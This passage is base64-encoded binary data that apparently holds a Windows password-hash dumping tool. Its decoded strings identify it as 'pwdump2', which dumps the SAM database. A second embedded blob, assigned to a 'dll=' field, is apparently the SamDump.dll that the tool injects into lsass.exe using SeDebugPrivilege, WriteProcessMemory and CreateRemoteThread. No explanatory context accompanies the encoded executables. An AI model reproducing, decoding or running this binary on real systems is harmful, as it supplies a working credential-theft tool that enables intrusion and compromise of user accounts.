+T3BlblByb2Nlc3MAHgBDbG9zZUhhbmRsZQAJAUdldEN1cnJlbnRQcm9jZXNzAPICVmlydHVhbEZy +ZWVFeABJAENyZWF0ZVJlbW90ZVRocmVhZAAAFwNXcml0ZVByb2Nlc3NNZW1vcnkAAO8CVmlydHVh +bEFsbG9jRXgAAAoBR2V0Q3VycmVudFByb2Nlc3NJZAA4AUdldE1vZHVsZUZpbGVOYW1lQQAAZQBE +aXNjb25uZWN0TmFtZWRQaXBlAD0CUmVhZEZpbGUAACYAQ29ubmVjdE5hbWVkUGlwZQAAkAJTZXRF +dmVudAAARABDcmVhdGVOYW1lZFBpcGVBAABLRVJORUwzMi5kbGwAABkAQWRqdXN0VG9rZW5Qcml2 +aWxlZ2VzABgBTG9va3VwUHJpdmlsZWdlVmFsdWVBAGcBT3BlblByb2Nlc3NUb2tlbgAAQURWQVBJ +MzIuZGxsAAC6AUhlYXBGcmVlAAC9AUhlYXBSZUFsbG9jALQBSGVhcEFsbG9jAIwARXhpdFByb2Nl +c3MAywJUZXJtaW5hdGVQcm9jZXNzAADaAEdldENvbW1hbmRMaW5lQQCOAUdldFZlcnNpb24AALgB +SGVhcERlc3Ryb3kAtgFIZWFwQ3JlYXRlAADxAlZpcnR1YWxGcmVlAO4CVmlydHVhbEFsbG9jAACY +AlNldEhhbmRsZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0 +dXBJbmZvQQDbAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAwQBGcmVlRW52aXJvbm1lbnRTdHJp +bmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAEDV2lkZUNoYXJUb011bHRpQnl0ZQAZAUdl +dEVudmlyb25tZW50U3RyaW5ncwAbAUdldEVudmlyb25tZW50U3RyaW5nc1cAAFcCUnRsVW53aW5k +AA4DV3JpdGVGaWxlALkARmx1c2hGaWxlQnVmZmVycwAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFyAGkB +R2V0U3RyaW5nVHlwZUEAAGwBR2V0U3RyaW5nVHlwZVcAAJUCU2V0RmlsZVBvaW50ZXIAAM8AR2V0 +Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAACoAlNldFN0ZEhhbmRsZQAA3AFMQ01hcFN0cmlu +Z0EAAN0BTENNYXBTdHJpbmdkAAAAAAAAAAAAAZGkAAAAAAAAAAAAAAAAAAAAAAAEwAUwBBAFMA +UwAuAEUAWABFAAAAUnRsQ29tcGFyZVVuaWNvZGVTdHJpbmcATnRRdWVyeVN5c3RlbUluZm9ybWF0 +aW9uAAAAAE5URExMAAAAClB3ZHVtcDIgLSBkdW1wIHRoZSBTQU0gZGF0YWJhc2UuClVzYWdlOiAl +cyA8cGlkIG9mIGxzYXNzLmV4ZT4KAEZhaWxlZCBzdGFydGluZyBsaXN0ZW4gb24gcGlwZTogJWQu +ICBFeGl0aW5nCgAAAEZhaWxlZCB0byBjcmVhdGUgcmVjZWl2aW5nIHRocmVhZDogJWQuICBFeGl0 +aW5nCgAAAABGYWlsZWQgdG8gb3BlbiBsc2FzczogJWQuICBFeGl0aW5nLgoAAAAARmFpbGVkIGVu +YWJsaW5nIERlYnVnIHByaXZpbGVnZS4gIFByb2NlZWRpbmcgYW55d2F5CgAAAABVbmFibGUgdG8g +ZmluZCBsc2Fzcy5leGUgcGlkIGF1dG9tYXRpY2FsbHkuCllvdSBuZWVkIHRvIHNwZWNpZnkgb24g +dGhlIGNvbW1hbmQgbGluZQoAAAAAVW5hYmxlIHRvIGFkanVzdCB0b2tlbiBwcml2aWxlZ2VzOiAl +ZAoAAFVuYWJsZSB0byBsb29rdXAgcHJpdmlsZWdlOiAlZAoAU2VEZWJ1Z1ByaXZpbGVnZQAAAABV +bmFibGUgdG8gb3BlbiBwcm9jZXNzIHRva2VuOiAlZAoAAABDcmVhdGVSZW1vdGVUaHJlYWQgZmFp +bGVkOiAlZAoAAFdyaXRlUHJvY2Vzc01lbW9yeSBmYWlsZWQ6ICVkCgAAVmlydHVhbEFsbG9jRXgg +ZmFpbGVkOiAlZAoAAFxcLlxwaXBlXHB3ZHVtcDItJWQARHVtcFNhbQBTYW1EdW1wLmRsbABGcmVl +TGlicmFyeQBHZXRQcm9jQWRkcmVzcwAATG9hZExpYnJhcnlBAAAAAEtlcm5lbDMyAAAAACVzAABG +YWlsZWQgdG8gY29ubmVjdCB0aGUgcGlwZTogJWQKAEZhaWxlZCB0byBjcmVhdGUgdGhlIHBpcGU6 +ICVkCgAAAAAAAACBQAAAAAAAAIFAAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAA +AAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgwAAaGFAAFhhQAD/////AAoAAAp2 +QAAKdkAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAg +ACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQA +hACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQAB +AAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIA +AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAQAAAC4AAAABAAAAAAAAAAAAAAAFAADACwAAAAAAAAAdAADABAAAAAAAAACWAADA +BAAAAAAAAACNAADACAAAAAAAAACOAADACAAAAAAAAACPAADACAAAAAAAAACQAADACAAAAAAAAACR +AADACAAAAAAAAACSAADACAAAAAAAAACTAADACAAAAAAAAAADAAAABwAAAAoAAACMAAAAIAWTGQAA +AAAAAAAAAAAAAAIAAADUY0AACAAAAKhjQAAJAAAAfGNAAAoAAABYY0AAEAAAACxjQAARAAAA/GJA +ABIAAADYYkAAEwAAAKxiQAAYAAAAdGJAABkAAABMYkAAGgAAABRiQAAbAAAA3GFAABwAAAC0YUAA +eAAAAKRhQAB5AAAAlGFAAHoAAACEYUAA/AAAAIBhQAD/AAAAcGFAAAAAAAAAAAAAeVNAAHlTQAB5 +U0AAeVNAAHlTQAB5U0AAAAAAAAAAAAABAgQIAAAAAKQDAABggnmCIQAAAAAAAACm3wAAAAAAAKGl +AAAAAAAAgZ/g/AAAAABAfoD8AAAAAKgDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4A +AAAAAABA/gAAAAAAALUDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABB/gAA +AAAAALYDAADPouSiGgDlouiiWwAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABAfqH+AAAAAFEFAABR +2l7aIABf2mraMgAAAAAAAAAAAAAAAAAAAAAAgdPY3uD5AAAxfoH+AAAAAAEAAAAWAAAAAgAAAAIA +AAADAAAAAgAAAAQAAAAYAAAABQAAAA0AAAAGAAAACQAAAAcAAAAMAAAACAAAAAwAAAAJAAAADAAA +AAoAAAAHAAAACwAAAAgAAAAMAAAAFgAAAA0AAAAWAAAADwAAAAIAAAAQAAAADQAAABEAAAASAAAA +EgAAAAIAAAAhAAAADQAAADUAAAACAAAAQQAAAA0AAABDAAAAAgAAAFAAAAARAAAAUgAAAA0AAABT +AAAADQAAAFcAAAAWAAAAWQAAAAsAAABsAAAADQAAAG0AAAAgAAAAcAAAABwAAAByAAAACQAAAAYA +AAAWAAAAgAAAAAoAAACBAAAACgAAAIIAAAAJAAAAgwAAABYAAACEAAAADQAAAJEAAAApAAAAngAA +AA0AAAChAAAAAgAAAKQAAAALAAAApwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwsamdumpdll="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v +ZGUuDQ0KJAAAAAAAAAA5YhDKfQN+mX0Dfpl9A36ZlRx1mXwDfpmVHHSZNwN+mf4fcJluA36ZJCBt +mXgDfpl9A3+ZNAN+mYIjdJl8A36ZgiN6mXwDfplSaWNofQN+mQAAAAAAAAAAUEUAAEwBBAAT+OA4 +AAAAAAAAAADgAA4hCwEGAABQAAAAUAAAAAAAAIoaAAAAEAAAAGAAAAAAABAAEAAAABAAAAQAAAAA +AAAABAAAAAAAAAAAsAAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAYGsAAEYA +AAAwZgAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAADkBQAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAOwAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAudGV4dAAAAKJNAAAAEAAAAFAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACm +CwAAAGAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAoCYAAABwAAAAEAAAAHAAAAAA +AAAAAAAAAAAAAEAAAMAucmVsb2MAAJQMAAAAoAAAABAAAACAAAAAAAAAAAAAAAAAAABAAABCAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +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 